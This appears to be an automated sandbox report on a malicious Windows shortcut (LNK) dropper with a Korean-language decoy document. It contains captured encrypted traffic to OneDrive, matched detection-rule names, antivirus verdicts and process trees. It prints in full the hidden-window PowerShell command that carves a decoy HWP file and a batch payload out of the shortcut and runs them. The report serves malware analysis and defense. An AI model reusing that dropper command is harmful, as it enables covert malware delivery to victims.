Data received | ÁKË®7¥@g(,²Ü2Bç}vlGì^lcÃ÷¥Å;&ãÿÕ)Súð>b¯ 8ªÊi?Á Ã"êaÎ7o"ö¾T®ö(£_hGÿ)É43ÅÓñIÀUL[ÃæƲاÜÑ5ø×NAÑ<é8 Éö?kNá°¤Ôné?i>Òa÷<ŸT6P!±¡ÿ&¤¹ø`ø'"'ZïßN÷8ìrUÇEÌl :§¦¯L¨|ðÑéà]¬&u`f¹ÀªyýÜFÈòâëç#XeF´ÆGÃ5o_QïHQ»ï[,Á#'5 ÐEaÄsq¼ÖûY@^u]FI/:QÈE 03ªl%µÕ¡X12ÂÛæIÙ¶VFcè7íö¨|âwr[ºÁzÖI £0©0U ]סWÛÏ+ÐÇÂwÎrv0U#0N"T æãnæúú¹í90Uÿ0U%0++0Uÿ0ÿ 0v+j0h0$+0http://ocsp.digicert.com0@+04http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0{Ut0r07 5 31http://crl3.digicert.com/DigiCertGlobalRootG2.crl07 5 31http://crl4.digicert.com/DigiCertGlobalRootG2.crl0U 00g0g0 +7 0 *H÷ %óaíT°JÃQÙtf"bKà @[¢/a¤Ää2§®Î÷fõ¥"¦Àä#'®Þa ì¼ûÊ¡µøp@l+ÒJÔ_e4î×qsû^¬ÂcÁ2T`UF ¹×|4;ÆÖúa ÀÏA«P}aò.4mS?ÈkÉ2ý°Lýcq_ £ýHÀvi$çq%cM¦.Åó¶jaD6,`þï°xàyeö$£¹%^÷"ÎæoP@ÓvrÍúCà#9C0µ7ÛÑü øsHU¶'Êìm¡ g a(=èÞaÙNO=kdzÒ`Í Ít¨6Ciÿ-yP>?å|æ aB=Â5d¹¸ÀÈK 2¥Ïut·§-ªÊ³*9sèä»È²«Kº$ôÎû|4¼ FÁí "ÊÐÉÖ4Ôü"F&}yçìy0øk¡¨Aêp£§Ug£]ù5Q:wNOtÕÙ 89»ePoì¹{Rf-[TdJ)0ÐsTYQ>]BQ£©øMX¯vºÝO5§¹Ôo¡Ûç&g.Ò¡Æá6ùÐâá9°R"µg\Z]K~]@3¢æ'ê>oðÑù]}OD»'fÍîmAm×ñWP04»zkÇÔöiNÇ ö©Ua±¸Ó;àªwüDrå¸ch'2¢Åä²h3·ðTSTét³HF3seÓbêõè |
Data received | gª÷Þ·°ùXñ ¾¬(7¸ø¥¥t½è~OìØ#Ñ´d7T |
Data received | j«ÆèC¶-bmUZpäiQû´VLÓüqÉa·±îRÔa£kJEG |
Data sent | s odZá¦ÑÙ£*ÓK§3ÿ¼ñæ3þéÂL´¡Ñ / 5 ÀÀÀ À 2 8 .ÿ api.onedrive.com |
Data sent | f ba«ç|ÒBe]D%ô±IBGQ'Q½_¹G§¹@vUÞ¡Üßµ:³àaÀ ÖìS è:ÖL¸hãD´ÈâÚ!9S¢o£ÿïH-ýc<øÀöq 0õ?"»+¶ BY×þ± î¯LXÖÄælðeÆHÁÖî PÏ O2ÞO |
Data sent | dZáÁWw"·\ûòU ü o¥°ëd&çEFiÌ=±Ù L æÓüSIºÐ8¼âfV¬°p»"À / 5 ÀÀÀ À 2 8 .ÿ api.onedrive.com |
Data sent | f ba Õ ¦ÑÑu®·* vÍ /·=@sü§µmQ ¯¦ß&ÍRËÏͬÔác.ð¦ÎU24õÁÀÊÝî6×#¥.S"+èT 0éI/·Æz¬ÊÛOo(×lJf ;VðBDçó;¼k»öî¼nNuBx¡® |
Data sent | dZáÌë8<Z¿ó?+ÔFèÐ ÃDÂåAS¢ î/ôO-:ãKßG¤ê²vëña°Ú3ßK / 5 ÀÀÀ À 2 8 .ÿ api.onedrive.com |
Data sent | f baÆÊó0¤ê¼tóXÒû⾧eµ._¯VýÅ[¤ßBXR]Yºä«q¥~µ¡Jt4ÞëÌR:)S h±W£y»åþaoÆØ26ÌCnÔNüöÎÂÌ 0S $¥<òØßR2ØPâJåj°WX¼þÙX×ux@¬1¸zãTw)R |
Data sent | dZá×ðä©ä×Ðû"çlÒ¹xz^¼qp\ 8wêÝfB²Ö)Âëæ2 / 5 ÀÀÀ À 2 8 .ÿ api.onedrive.com |
Data sent | f bax³]°HËU|6®ÿ £¡òÛ~Gâ8 yD¥z&(-:¾VJwÎ#»ÑÐ}'ýµ¯~àP¹·ª¦èJ yAõ°·'àa%þu¼ú¤¡#A«^ ) 0;¿¥ÜSW÷èÿwiþä^þ- 4ɺ Lþã·C[çõþÈ3Mü+å |
Data sent | dZáâÔSB¸1a ëZv_eiCÅDK èÉ w? xìe¬SF:VK¥úÌ7hÒ£Kx G¥v / 5 ÀÀÀ À 2 8 .ÿ api.onedrive.com |
Data sent | f ba»8#Ô Ø"( ø#UJÚ[º-Ú¤o«¡{ú÷çÅ+o{¸YòP0BÚÆ È{^ÇÐþZuõ °|'êø"rújZصõRtOÐg¯iØî ôµ?(==o 0<²¬â¸ýͯÀ( @4³SýA¬!¨}ß dzÍ¢é«~¥üì}# |
Data sent | dZáíà I¿ä,ûsåpàåçL Ühû ) H hWC.?D æ Ô [»]ôÁsGçô / 5 ÀÀÀ À 2 8 .ÿ api.onedrive.com |
Data sent | f ba¢ vî¿7PàæÜÏ*uúD´Iì÷= ÿ·Ñzx~Àò®4>ë³|²Óÿ¼yFÚN_#¾køù3ü¿vôÚ×\jÈ×ßK_1Ñ¿s÷7Ũ 0î¬ ¬t!| ºÌðZפlãØH(9¢0ññÄÎ'¦"BqLw#é |
Data sent | dZáøgקè÷Ë«7UÖ+Ñ%CÌ5X] G ߣï:<¥7¨×Ðr®"¾Üc:Ìï / 5 ÀÀÀ À 2 8 .ÿ api.onedrive.com |
Data sent | f ba¾41;Ï'å>óĹr39 ¤Æ÷+®ôÊèy-~&>d²§Ì4ÏçFØÅFÐGd Ðì#¢òþ v`ø}l¦]´Ôýãïôk"ë.Áutê½ 0aTÚäVêÐLÃQaNwÔ¬´YÝVþj `ËÔV&Hs¹%`C¸\+vM |
Data sent | dZâÝ>1 qñýÐéø<~â(ñò"·Ã~ÿÉäàÛ ÝM 3,Û© yîxòÄ·r¤NÆmL³ / 5 ÀÀÀ À 2 8 .ÿ api.onedrive.com |
Data sent | f baIeâèÆ2Cß_EÖfÃWÀ$v@þÎ(õam(p^/]ò?]DKOúáÄÂ7ô5¸ÑÕ{©æY'ÇÓï,Ì»{ÊÌ.Þàüx[¯¹òR |ü1«ô 0¯GCdߥEÆi¶( ús=ºn!Ý@SÇh`QRU`)tí |
Data sent | dZâo.°>ø¾þâ-èílÎK¢¼-EÔeï¹ 5 ±*Q Óº<K1Ò`º½[±t / 5 ÀÀÀ À 2 8 .ÿ api.onedrive.com |
Data sent | f baìiÙ.GÞ±àļÞbJ÷/S$ÚlÏìmçf\Î(²BJ/"røgÖC4mÎ#Û×W÷<?p£#Çucÿø{; £]«ú>þÂá 0ÕòLqåX ܹ߲ª Üf·aél6d5¹>ÿâlW<±^q½íîêã*PÛpç |
Data sent | dZâ9Ûó=.ÑAФö ÿAL68ÿݶ8 7 ´\Yÿ(úØRmx+y³^µÖ3R / 5 ÀÀÀ À 2 8 .ÿ api.onedrive.com |
Data sent | f ba¤Lº :Ênéá.$Uªazö£´{%¢@«=Ý Uj6µO0uÇö] ]eVÿÌQÑå#Ur«H¥ $hÔeäRK½RKȬ.Ú )kBtiYcóm 0ª Ù-ìö=X9øÌDÉ»¬AÐ/b°8÷é´@5Åß_rãq¶iOSP¥ |
description | Create a windows service | rule | Create_Service | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mobuv0cw.cmdline" |
cmdline | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\owptouvz.cmdline" |
cmdline | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hi1x_fj5.cmdline" |
cmdline | powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath; |
cmdline | "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath; |
cmdline | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\n5j0ib9u.cmdline" |
FireEye | Heur.BZC.YAX.Boxter.949.9B7AE7BC |
ALYac | Heur.BZC.YAX.Boxter.949.9B7AE7BC |
Arcabit | Heur.BZC.YAX.Boxter.949.9B7AE7BC |
ESET-NOD32 | LNK/TrojanDropper.Agent.DD |
Cynet | Malicious (score: 99) |
Kaspersky | HEUR:Trojan.WinLNK.Powecod.c |
BitDefender | Heur.BZC.YAX.Boxter.949.9B7AE7BC |
Emsisoft | Heur.BZC.YAX.Boxter.949.9B7AE7BC (B) |
F-Secure | Malware.LNK/Drop.Agent.VPVF |
VIPRE | Heur.BZC.YAX.Boxter.949.9B7AE7BC |
Sophos | Troj/LnkDrop-M |
SentinelOne | Static AI - Suspicious LNK |
Avira | LNK/Drop.Agent.VPVF |
ZoneAlarm | HEUR:Trojan.WinLNK.Powecod.c |
GData | Heur.BZC.YAX.Boxter.949.9B7AE7BC |
Detected | |
MAX | malware (ai score=89) |
VBA32 | Trojan.Link.Crafted |
parent_process | powershell.exe | martian_process | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mobuv0cw.cmdline" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hi1x_fj5.cmdline" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\owptouvz.cmdline" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\n5j0ib9u.cmdline" | ||||||
parent_process | powershell.exe | martian_process | "C:\Users\test22\AppData\Local\Temp\230509.bat" | ||||||
parent_process | powershell.exe | martian_process | "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp" | ||||||
parent_process | powershell.exe | martian_process | C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp |
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe |